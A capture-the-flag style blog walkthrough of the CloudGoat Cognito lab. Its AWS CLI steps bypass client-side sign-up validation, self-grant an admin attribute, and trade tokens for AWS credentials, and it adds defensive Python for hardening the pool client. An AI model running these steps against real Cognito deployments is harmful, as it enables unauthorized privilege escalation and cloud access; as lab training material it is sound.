CloudGoat: Vulnerable_Cognito

0xLeeBai
3 min read · May 7, 2024


Note:

  • We will be performing the attack from Kali Linux
  • Ensure you have completed the prerequisites (AWS CLI configured, CloudGoat installed under /opt/cloudgoat) before starting the lab

1. Preparation

1.1 Launch the scenario:

┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create vulnerable_cognito

1.2: read the start.txt file (the scenario directory is named after the scenario, not vulnerable_lambda)

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd vulnerable_cognito*

┌──(root㉿kali)-[/opt/cloudgoat/xxx]
└─# cat start.txt

apigateway_url = https://xxxyyy/index.html
... ... ...

2. Enumeration

2.1 open the URL in a browser

  • the page offers a sign-up option
  • signing up with a personal Gmail address fails: the form rejects the email address client-side
  • viewing the page source, lines 43 and 44 contain useful information: the Cognito app client id and the region used by the JavaScript

2.2: use the AWS CLI to "sign up" and "confirm" the account manually, bypassing the client-side email validation (the validation lives only in the page's JavaScript; the Cognito API itself accepts any address the pool allows)

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp sign-up --client-id 6838885ultq3m8b3n0n93ov3ek --username helloworld@gmail.com --password P@ssw0rd --user-attributes '[{"Name":"given_name","Value":"lorem"},{"Name":"family_name","Value":"ipsum"}]' --region us-east-1

The confirmation code (OTP) arrives in the Gmail inbox; use it to confirm the account:

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp confirm-sign-up --client-id 6838885ultq3m8b3n0n93ov3ek --username helloworld@gmail.com --confirmation-code 287215 --region us-east-1

2.3: login via browser with our signed up credentials

  • once logged in, we are redirected to reader.html page

2.4: get the value of the access token

  • inspect element > storage > local storage > copy the value of the xxx.accessToken entry (it is a local storage item, not a cookie) > save it into a file "accessToken.txt"
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat accessToken.txt

access token = eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx

2.5: get the user attributes and metadata for the user

  • note the custom:access attribute in the output: the application uses it to decide who gets the admin page

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp get-user --access-token eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx --region us-east-1

2.6: update the user attribute to grant ourselves admin permission

  • the app client allows the signed-in user to write custom:access, and the site trusts that attribute for authorization, so the user can promote themselves
  • the call is update-user-attributes (get-user is read-only and does not accept --user-attributes)

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp update-user-attributes --access-token eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx --user-attributes '[{"Name":"custom:access","Value":"admin"}]' --region us-east-1
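The root cause of step 2.6 is an app client that lets end users write an attribute the application treats as authorization data. The check below is an added example, not part of the CloudGoat scenario or the original post: it takes the JSON returned by `aws cognito-idp describe-user-pool-client --user-pool-id <pool> --client-id <client>` (the same shape boto3 returns), reports which sensitive attributes a signed-in user may change through update-user-attributes, and computes the write list you would pass to `update-user-pool-client --write-attributes` to harden it. The sample response, pool id and client id are constructed placeholders, and the set of attribute names treated as sensitive is an assumption for the example.

```python
"""Find user-writable authorization attributes on a Cognito app client.

Added example (not the original post's or CloudGoat's code). Input is the
dict from `describe-user-pool-client`; the sample below is constructed.
"""

# Constructed sample: a client that lets the user write custom:access,
# which is exactly the misconfiguration the lab exploits in step 2.6.
SAMPLE_CLIENT = {
    "UserPoolClient": {
        "UserPoolId": "us-east-1_EXAMPLE",      # placeholder, not the lab's pool
        "ClientId": "exampleclientid",          # placeholder, not the lab's client
        "ReadAttributes": ["email", "given_name", "family_name", "custom:access"],
        "WriteAttributes": ["email", "given_name", "family_name", "custom:access"],
    }
}

# Attribute names an application might use for authorization decisions.
# This list is an assumption for the example; adapt it to your own schema.
SENSITIVE_ATTRIBUTES = {"custom:access", "custom:role", "custom:isadmin"}


def user_writable_attributes(desc):
    """Return the set of attributes the app client lets a signed-in user write.

    Returns None when WriteAttributes is absent, which (assumption: the
    Cognito default for a client created without explicit permissions)
    means every attribute is writable.
    """
    client = desc.get("UserPoolClient", desc)
    writable = client.get("WriteAttributes")
    if writable is None:
        return None
    return set(writable)


def find_writable_sensitive(desc, sensitive=SENSITIVE_ATTRIBUTES):
    """Sensitive attributes the user can change via update-user-attributes."""
    writable = user_writable_attributes(desc)
    if writable is None:
        # Default permissions: everything is writable, so all are exposed.
        return set(sensitive)
    return writable & set(sensitive)


def hardened_write_attributes(desc, sensitive=SENSITIVE_ATTRIBUTES):
    """Write list with authorization attributes removed.

    Pass this to `aws cognito-idp update-user-pool-client --write-attributes`
    so the attribute can only be set server-side (admin-update-user-attributes
    by a privileged principal), never by the user holding an access token.
    """
    writable = user_writable_attributes(desc) or set()
    return sorted(writable - set(sensitive))


if __name__ == "__main__":
    exposed = find_writable_sensitive(SAMPLE_CLIENT)
    print("user-writable authorization attributes:", sorted(exposed))
    print("hardened --write-attributes:", " ".join(hardened_write_attributes(SAMPLE_CLIENT)))
```

Removing the attribute from the client's write list is the per-client control; a custom attribute's schema-level Mutable flag cannot be changed after creation, so a pool that needs an immutable marker has to define a new attribute. Either way, an authorization decision should be based on a claim the user cannot set, such as a Cognito group, rather than a self-service profile field.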

2.7: get the IdentityPoolId, a fresh ID token, and the identity id

  • log out and log back in, then browse to "admin.html" manually; the new custom:access value only appears in tokens issued after re-authentication
  • view the page source to find the IdentityPoolId and the user pool id
  • pull the fresh token from local storage again; the identity pool's --logins map expects the ID token (xxx.idToken), not the access token, so copy that entry
# ***SYNTAX***
# aws cognito-identity get-id --region [region] --identity-pool-id '[IdentityPool_Id]' --logins "cognito-idp.{region}.amazonaws.com/{UserPoolId}={idToken}"

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-identity get-id --region us-east-1 --identity-pool-id 'us-east-1:a6e3df92-034e-4fd1-968f-beb577bd5a92' --logins "cognito-idp.us-east-1.amazonaws.com/us-east-1_BEEOWbReZ=eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx"

{
"IdentityId": "us-east-1:9b575e70-f9d7-cd3e-8840-7be3fecf4d37"
}
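Steps 2.4 to 2.7 juggle two JWTs, and the identity pool only accepts one of them. The following is an added example, not code from the original post or from CloudGoat: it decodes a Cognito token's payload (no signature check, since here we are the bearer, not the verifier), tells the access token from the ID token by its token_use claim, confirms the custom:access claim is present in the ID token, and builds the --logins map from the iss claim. The two tokens are constructed locally with a dummy signature; the pool id, client id and claims are placeholders rather than values from the lab.

```python
"""Inspect Cognito JWTs and build the identity-pool --logins map.

Added example, not part of the original walkthrough. Tokens below are
constructed (dummy signature) so the script runs offline.
"""
import base64
import json

REGION = "us-east-1"
USER_POOL_ID = "us-east-1_EXAMPLE"   # placeholder, not the lab's pool id
CLIENT_ID = "exampleclientid"        # placeholder, not the lab's client id
ISSUER = f"https://cognito-idp.{REGION}.amazonaws.com/{USER_POOL_ID}"


def _b64url_decode(segment):
    """Base64url decode with the padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(obj):
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()


def _make_token(claims):
    """Assemble a three-part token for the constructed samples only (fake signature)."""
    return ".".join([_b64url_encode({"alg": "RS256", "kid": "example"}),
                     _b64url_encode(claims), "c2ln"])


# Constructed samples mirroring what Cognito puts in each token: the access
# token carries no user attributes, the ID token carries custom:access.
ACCESS_TOKEN = _make_token({
    "sub": "00000000-0000-0000-0000-000000000000", "token_use": "access",
    "iss": ISSUER, "client_id": CLIENT_ID, "username": "helloworld@gmail.com",
})
ID_TOKEN = _make_token({
    "sub": "00000000-0000-0000-0000-000000000000", "token_use": "id",
    "iss": ISSUER, "aud": CLIENT_ID, "email": "helloworld@gmail.com",
    "custom:access": "admin",
})


def decode_claims(jwt):
    """Return the payload claims of a compact JWS without verifying it."""
    parts = jwt.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS (expected header.payload.signature)")
    return json.loads(_b64url_decode(parts[1]))


def is_id_token(jwt):
    """True when Cognito issued this as an ID token (token_use == 'id')."""
    return decode_claims(jwt).get("token_use") == "id"


def custom_attribute(jwt, name="custom:access"):
    """Value of a custom attribute claim, or None if the token has none."""
    return decode_claims(jwt).get(name)


def logins_key(claims):
    """Provider key for --logins: cognito-idp.<region>.amazonaws.com/<pool id>."""
    iss = claims["iss"]
    if not iss.startswith("https://cognito-idp."):
        raise ValueError(f"unexpected issuer: {iss}")
    return iss[len("https://"):]


def logins_map(jwt):
    """Build the --logins map for cognito-identity get-id / get-credentials-for-identity."""
    claims = decode_claims(jwt)
    if claims.get("token_use") != "id":
        raise ValueError(f"identity pools need the ID token, got token_use={claims.get('token_use')!r}")
    return {logins_key(claims): jwt}


if __name__ == "__main__":
    for name, tok in (("access", ACCESS_TOKEN), ("id", ID_TOKEN)):
        print(name, "token_use:", decode_claims(tok)["token_use"],
              "custom:access:", custom_attribute(tok))
    key, val = next(iter(logins_map(ID_TOKEN).items()))
    print(f'--logins "{key}={val[:20]}..."')
```

The custom:access claim lives only in the ID token, which is also why step 2.7 needs a logout and login: Cognito does not rewrite a token that was issued before the attribute changed.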

2.8: collect the credentials

  • the same --logins map exchanges the ID token for temporary AWS credentials scoped to the identity pool's authenticated role

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-identity get-credentials-for-identity --region us-east-1 --identity-pool-id 'us-east-1:a6e3df92-034e-4fd1-968f-beb577bd5a92' --logins "cognito-idp.us-east-1.amazonaws.com/us-east-1_BEEOWbReZ=eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx"

{
... ... ...
"Credentials": {
"AccessKeyId": "xxxaaa",
"SecretKey": "xxxbbb",
"SessionToken": "xxxccc",
... ... ...
}
}

2.9: enumerate the IAM permissions of the temporary credentials with enumerate-iam (it brute-forces read-only API calls across services and reports which ones succeed)

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd /opt

┌──(root㉿kali)-[/opt]
└─# git clone https://github.com/andresriancho/enumerate-iam.git

┌──(root㉿kali)-[/opt]
└─# cd enumerate-iam

┌──(root㉿kali)-[/opt/enumerate-iam]
└─# pip install -r requirements.txt

┌──(root㉿kali)-[/opt/enumerate-iam]
└─# ./enumerate-iam.py --region us-east-1 --access-key xxxaaa --secret-key xxxbbb --session-token xxxccc

3. Clean up

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy vulnerable_cognito

Destroy "vulnerable_xxx" ? [y/n]: y


0xLeeBai

Before my bed the bright moonlight shines; I take it for frost on the ground. I raise my head to gaze at the bright moon, then lower it, thinking of home.